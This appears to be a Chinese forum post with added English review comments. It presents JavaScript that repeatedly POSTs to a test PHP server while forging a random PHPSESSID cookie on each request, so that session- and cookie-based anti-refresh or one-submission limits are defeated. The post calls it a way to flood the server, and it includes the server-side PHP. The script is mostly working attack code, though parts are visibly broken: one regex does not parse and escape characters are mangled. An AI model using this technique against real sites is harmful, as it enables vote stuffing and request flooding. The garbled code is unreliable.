如果是基于session或者cookie做防止刷新,那么,我可以伪造状态,用xmlhttp把服务器刷爆 代码如下,服务器端的代码在最后一个textarea里。
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title> xmlhttp</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script language="javascript" type="text/javascript" src="fckXML.js"></script>
<script language="javascript" type="text/javascript">
<!--
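function SetCookie(sName, sValue)
{
    // Writes the cookie `sName=sValue` on the current document.
    // The value goes through the legacy escape() (encodeURIComponent is the
    // modern equivalent). `expires` is the current moment, so most browsers
    // treat the cookie as already expired and discard it as soon as it is
    // written; a caller that wants it to persist has to move `date` into
    // the future. Nothing in the visible script calls this helper.
    // `date` was an implicit global in the original; it is now local
    // (`var`, matching the file's pre-ES6 style).
    var date = new Date();
    document.cookie = sName + "=" + escape(sValue) + "; expires=" + date.toGMTString();
}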
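// XMLHttpRequest factory for the two engines this page knows about:
// the native XMLHttpRequest (Gecko and later browsers) or the MSXML
// ActiveX object on old IE. Declared with `var` rather than as an implicit
// global, and guarded with typeof so the script still loads where `window`
// does not exist (oXmlHttp is then left null). The rest of the page assumes
// the object was created and calls open()/send() on it without checking.
var oXmlHttp = null;
if ( typeof window !== "undefined" && window.XMLHttpRequest ) // Gecko
    oXmlHttp = new XMLHttpRequest() ;
else if ( typeof window !== "undefined" && window.ActiveXObject ) // IE
    oXmlHttp = new ActiveXObject("MsXml2.XmlHttp") ;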
/*
看了并分析了服务器端的结果,依靠xmlhttp来伪造ip是不可能的了。
setRequestHeader
单独指定请求的某个http头
你的客户机ip不在其中,如果服务器端是基于ip防止刷新的,你就别费心了呗,除非是用c写socket自定义ip包。而且能确保头不被网关修改。
如果服务器是asp的基于session认证的,呵呵,那怎么办哪。用c写socket程序?怎么伪造我不知道了。
如果服务器是php的基于session或者cookie防止刷新,呵呵,那我就ok了。
下一步计划,搞清楚asp的session机制。反正不是依靠cookie的。我没办法了,除非寻找c语言的解决方案。
*/
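// Request settings shared with zuobiStart(). Declared with `var` so the
// script no longer relies on implicit globals. In the original, urlToCall
// was assigned three times in a row and only the last value survived; the
// two dead assignments are dropped here.
var urlToCall = "http://test.bai.com/jstest/xmlhttp/server.php";
var host = "test.bai.com";   // passed as a Host header below (modern browsers refuse to set it)
var bAsync = 1 ;             // truthy: open() is asynchronous
var result = '';             // accumulated responseText across ticks
var i = 1;                   // timer tick counter, incremented by zuobiStart()
var n = 2;                   // zuobiStart() stops the timer once i exceeds this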
// Timer callback (scheduled with setInterval further down): on every tick it
// POSTs `params` to urlToCall with a freshly made-up PHPSESSID cookie, and
// clears the timer after n ticks. Read as a defender, this is a demonstration
// that an "already posted" flag kept in $_SESSION is only as strong as the
// client's willingness to keep presenting the same session cookie: an unknown
// session id makes the server start an empty session, so the flag is never
// seen. Detection signal: many requests from one client whose PHPSESSID
// differs on every request. Mitigation: tie the limit to an identity the
// client cannot reset at will (e.g. an authenticated account), not to
// cookie/session state alone.
//
// NOTE(review): backslashes appear to have been lost when the page was
// rendered ("/n" where "\n" is meant, later in this function); the regex on
// the replace() line below reads as `//./g`, which is a line comment and does
// not parse as written. Every variable assigned in here is an implicit global.
function zuobiStart()
{
//open the URL
oXmlHttp.open( "POST", urlToCall, bAsync ) ;
//forge a session id to fool the server: the server's session for this request
//is swapped out, so all of its session state loses its meaning.
phpsessid = Math.random();
id2 = Math.random();
phpsess = phpsessid.toString()+'11111'+id2.toString();
//presumably meant to turn the "0." decimal points into digits — see the NOTE
//above the function about the mangled regex.
phpsess = phpsess.replace( //./g,"0" );
phpsess = phpsess.substr( 0,32 );
cook ="PHPSESSID="+phpsess+"; ";
//set PHPSESSID: PHP sessions are keyed by this cookie, so the server-side
//session is reset for this request
document.cookie=cook;
//the following headers can be modified
oXmlHttp.setRequestHeader ( "ADDR000", 'test' );
oXmlHttp.setRequestHeader ( "User-Agent", "Mozilla/4.0 " );
oXmlHttp.setRequestHeader( "accept-language", "zh_cn");
oXmlHttp.setRequestHeader( "CONTENT-TYPE","application/x-www-form-urlencoded");
oXmlHttp.setRequestHeader( "accept-encoding", "gzip, deflate");
oXmlHttp.setRequestHeader( "CONNECTION", "keep-alive");
oXmlHttp.setRequestHeader( "accept", "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
//the following headers cannot be modified; the server does not accept the
//changes. (Modern browsers treat Referer, Cookie, Host and Content-Length as
//forbidden request headers and ignore these calls; the cookie that is
//actually sent is the one written to document.cookie above.)
oXmlHttp.setRequestHeader( "Referer", 'example.test.com');
oXmlHttp.setRequestHeader ("Cookie", cook);
oXmlHttp.setRequestHeader ("HOST", host );
oXmlHttp.setRequestHeader( "content-length", "11");
oXmlHttp.setRequestHeader( "CACHE_CONTROL", "kcache");
params = 'item_button=45&topic=5';
//send the request
oXmlHttp.send(params) ;
//collect the response (handler is attached after send())
oXmlHttp.onreadystatechange = function()
{
if ( oXmlHttp.readyState == 4 )
{
result += oXmlHttp.responseText;
}
}
//
i++;
//stop the timer once n ticks have run and show what was collected
if (i>n){
//alert("end/n"+i.toString()+"/n"+n.toString());
infoObj = document.getElementById('info');
infoObj.value = result;
//info.value = result+"慰问慰问";
clearInterval(flushtimerID);
}
}//end func
//结束
flushtimerID = window.setInterval(zuobiStart,100);
//-->
</script>
</head>
<body>
<textarea name="info" id="info" rows="10" cols="90" >
31号 杨杰晰
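<?php
// Server side of the test: a per-session "already posted" flag plus a
// per-cookie request counter.
// NOTE(review): both checks rest on state the client supplies (the PHPSESSID
// cookie and the currNum cookie). A client that sends a fresh or random
// session id starts with an empty $_SESSION, so the flag below cannot by
// itself enforce a one-submission limit; a limit that must hold needs an
// identity the client cannot reset at will (e.g. an authenticated account),
// which is outside this script.
require_once('echo.php');
session_start();
//pr($_COOKIE);pr($_GET);pr($_POST);
//pr($_SESSION);pr($_COOKIE);
// isset() avoids an undefined-index notice on a brand-new session.
if (isset($_SESSION['posted']) && $_SESSION['posted'] == 1) {
    echo "error";
    die();
}
// The counter comes from an untrusted cookie and is later used to build a
// file name, so keep only a non-negative integer.
$num = 0;
$expires = time() + 60*60*24*365;
if (!isset($_COOKIE['currNum'])) {
    setcookie('currNum', 1, $expires);
    // "/n" in the original looks like a rendering-mangled "\n"; restored.
    echo "cookie没有设置\n";
} else {
    $num = (int) $_COOKIE['currNum'];
    if ($num < 0) {
        $num = 0;
    }
    $num++;
    setcookie('currNum', $num);
    echo $num;
}
?>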
<style type="text/css">
*{font:12px verdana;}
</style>
<pre>
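<?php
// Echo the POST fields and the server environment, create an empty marker
// file named after the cookie counter, then mark this session as posted.
$str = '';   // was never initialised in the original (notice on the first .=)
// The original did `$$key = $v;` in this loop, creating a variable named
// after every POST field. That lets any request overwrite a local variable
// — including $num, which becomes part of a file name below — so it is
// removed; the values are only echoed.
foreach ($_POST as $key => $v) {
    // "/r/n" in the original looks like a rendering-mangled "\r\n"; restored.
    $str .= $v . "\r\n";
}
//print_R($_SERVER);
foreach ($_SERVER as $k => $v) {
    $str .= $k . "=" . $v . "\n";
}
// $_POST and several $_SERVER entries (User-Agent, Referer, ...) are
// client-controlled and this output lands inside the HTML page, so escape it.
echo htmlspecialchars($str, ENT_QUOTES, 'UTF-8');
// $num comes from a client cookie; force it to an integer before it becomes
// part of a path so the name cannot escape d:/tmp (e.g. via "../").
$fname = "d:/tmp/" . (int) $num . ".txt";
$fp = fopen($fname, "wb");
// fopen() returns false on failure; the original passed that to fclose().
if ($fp !== false) {
    //fwrite($fp,$str);
    fclose($fp);
}
$_SESSION['posted'] = 1;
?>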